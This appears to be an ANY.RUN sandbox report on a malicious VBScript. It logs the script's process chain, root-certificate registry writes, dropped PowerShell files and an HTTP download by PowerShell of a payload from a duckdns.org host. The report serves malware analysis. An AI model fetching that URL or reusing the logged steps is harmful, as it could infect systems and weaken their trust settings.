c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2136"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Caselessly.Hov && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3984"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\doc-r25-210341852.vbsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
4044cmd.exe /c ping 6777.6777.6777.677eC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
4068ping 6777.6777.6777.677eC:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
Total events
10 617
Read events
10 577
Write events
28
Delete events
12

Modification events

(PID) Process:(3984) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3984) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
Operation:delete valueName:9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Value:
(PID) Process:(3984) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:writeName:Blob
Value:
0F00000001000000200000009065F32AFC2CFEA7F452D2D6BE94D20C877EFC1C05433D9935696193FDCC05D80300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3
(PID) Process:(3984) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:delete valueName:File
Value:
(PID) Process:(3984) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:delete keyName:(default)
Value:
(PID) Process:(3984) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:writeName:Blob
Value:
1400000001000000140000005D6CA352CEFC713CBBC5E21F663C3639FD19D4D70300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3
(PID) Process:(3984) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:writeName:Blob
Value:
190000000100000010000000BCC80DAA2F98A4692805BFF4CBB372EB0300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3
(PID) Process:(3984) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3984) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3984) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
Executable files
0
Suspicious files
9
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3984wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
1036powershell.exeC:\Users\admin\AppData\Local\Temp\eumo40bq.3sg.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1060powershell.exeC:\Users\admin\AppData\Local\Temp\qn3b4odh.maf.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1036powershell.exeC:\Users\admin\AppData\Roaming\Caselessly.Hovtext
MD5:E9C18D978961144D4B45B3DA857B6942
SHA256:466242AE14ADE651AA0D8296EC3088290A987A18634CEEFF220AFEB3F52A65B0
1060powershell.exeC:\Users\admin\AppData\Local\Temp\npiyquju.k4j.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1036powershell.exeC:\Users\admin\AppData\Local\Temp\dsi2f1ox.kyl.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3984wscript.exeC:\Users\admin\AppData\Local\Temp\Tar3B47.tmpbinary
MD5:435A9AC180383F9FA094131B173A2F7B
SHA256:67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34
3984wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:D34F5C146C542EDC37F991FF7F0D10D1
SHA256:1942BB42CCAD165BB012BCE7925EF102B699917F09E5611E285492E7FF3932DC
3984wscript.exeC:\Users\admin\AppData\Local\Temp\Cab3B46.tmpcompressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
1036powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:6675EDE59684F4A119D2E5DA282AFBE6
SHA256:5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
3
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3984
wscript.exe
GET
200
2.23.154.144:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5c99d8d69b8c3556
unknown
unknown
1036
powershell.exe
GET
200
84.247.187.12:80
http://madibarohilalatwo.duckdns.org/all/Electroencephalographs.mso
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
3984
wscript.exe
2.23.154.144:80
ctldl.windowsupdate.com
Akamai International B.V.
AT
unknown
1088
svchost.exe
224.0.0.252:5355
unknown
1036
powershell.exe
84.247.187.12:80
madibarohilalatwo.duckdns.org
BRDY AS
NO
unknown

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 2.23.154.144
whitelisted
6777.6777.6777.677e
  • 49.13.77.253
unknown
madibarohilalatwo.duckdns.org
  • 84.247.187.12
unknown

Threats

PID
Process
Class
Message
1088
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
1088
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1036
powershell.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
doc-r25-210341852.vbs